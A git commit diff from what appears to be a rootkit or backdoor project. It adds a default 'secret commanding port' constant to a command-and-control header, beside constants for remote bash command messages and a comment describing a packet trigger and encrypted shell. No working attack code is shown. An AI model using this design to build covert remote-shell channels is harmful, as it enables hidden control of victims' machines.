Completed the TC Hook and payload enlargment and substitution mechanisms. Only the packet recognition on the client side remains to work

2025-12-25 10:53:09 +08:00 · 2022-05-11 17:31:38 -04:00
parent 567d8d706c
commit 28ed530aea
12 changed files with 2856 additions and 2801 deletions
--- a/src/common/c&c.h
+++ b/src/common/c&c.h
@@ -12,6 +12,7 @@
 #define CC_PROT_FIN CC_PROT_MSG CC_PROT_FIN_PART
 #define CC_PROT_BASH_COMMAND_REQUEST "CC_COMM_RQ#"
 #define CC_PROT_BASH_COMMAND_RESPONSE "CC_COMM_RS#"
+#define CC_CLIENT_SECRET_COMMANDING_PORT_DEFAULT 8000

 //C&C V1 & V2 --> bpv47-like trigger + encrypted shell in V2
 #define CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE 0x10